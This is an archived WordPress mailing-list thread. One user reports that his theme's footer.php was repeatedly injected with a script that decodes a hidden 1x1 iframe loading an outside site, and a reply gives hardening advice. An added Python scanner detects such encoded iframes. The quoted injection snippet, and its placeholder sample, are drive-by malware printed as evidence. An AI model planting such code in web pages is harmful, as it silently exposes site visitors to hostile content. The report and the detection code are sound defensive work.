[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Ozh ozh at ozh.org
Sun Oct 31 18:15:51 UTC 2010

Typically not a Dreamhost issue, otherwise there would be *thousands*
of people screaming, and me in the first line.

Being up to date with WP is fine, but most hacks on shared hosting are
not done using WP
- check file permissions <http://codex.wordpress.org/Hardening_WordPress>
- check other software & scripts running on your blog
- change your main/SSH/FTP password
- change your WP password

I once had a WP blog hacked on Dreamhost. A few hours of investigation
later (checking all the above + inspecting access logs) I found out
that the insecure stuff was Scuttle (a delicious clone).

On shared hosting WP is often the target, but rarely the entrance.

On Sun, Oct 31, 2010 at 4:07 PM, Mladen Adamovic
<mladen.adamovic at gmail.com> wrote:
> Hi guys,
> My wordpress software instance was repeatedly hacked ... running latest
> Wordpress source code and being hosted on Dreamhost.
> I don't know which exploit it did use and couldn't identify it, but it was
> adding the following code to my default theme footer.php:
> <script>
> enc =
> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
> withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> dec = unescape(enc);
> document.write(dec);
> </script>
> I think I'll have to migrate to Blogger, since I couldn't identify exploit
> it did use.
> I wanted to drop you an email anyhow since identifying exploits is
> important!
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
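
One way to check theme and plugin files for the kind of injection quoted above, as an added example that is not part of the original thread: it finds percent-encoded JavaScript string literals, decodes them and reports any iframe hidden inside. The function names, the sample file content and the `malicious.example` host are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import unquote, urlparse

# JS string literals that carry percent-encoded markup, e.g. "%3Ciframe%20..."
ENCODED_LITERAL = re.compile(r"""(["'])((?:(?!\1).)*%3C(?:(?!\1).)*)\1""", re.I | re.S)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def find_injected_iframes(text):
    """Return one finding per iframe hidden in a percent-encoded string."""
    findings = []
    for match in ENCODED_LITERAL.finditer(text):
        # Real spaces are encoded as %20, so raw whitespace inside the
        # literal is only line wrapping and is dropped before decoding.
        decoded = unquote(re.sub(r"\s+", "", match.group(2)))
        for tag in IFRAME.findall(decoded):
            attrs = {m[0].lower(): (m[1] or m[2] or m[3]) for m in ATTR.findall(tag)}
            src = attrs.get("src", "")
            tiny = attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1")
            findings.append({"line": text.count("\n", 0, match.start()) + 1,
                             "src": src, "host": urlparse(src).hostname,
                             "hidden": tiny})
    return findings


def scan_tree(root):
    """Scan .php/.js/.html files under root; returns {path: findings}."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".php", ".js", ".html"}:
            found = find_injected_iframes(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits


# Constructed sample modelled on the footer.php injection quoted above;
# the host is a placeholder, not the one from the report.
SAMPLE = """<?php wp_footer(); ?>
<script>
enc = "%3Ciframe%20width%3D1%20height%3D1%20src%3D%27http%3A//malicious.example/x.php%27%3E%3C/iframe%3E";
dec = unescape(enc);
document.write(dec);
</script>
"""

if __name__ == "__main__":
    for finding in find_injected_iframes(SAMPLE):
        print(finding)
```

Point `scan_tree()` at the `wp-content` directory; a clean scan does not rule out other entry points such as the third-party scripts mentioned in the reply.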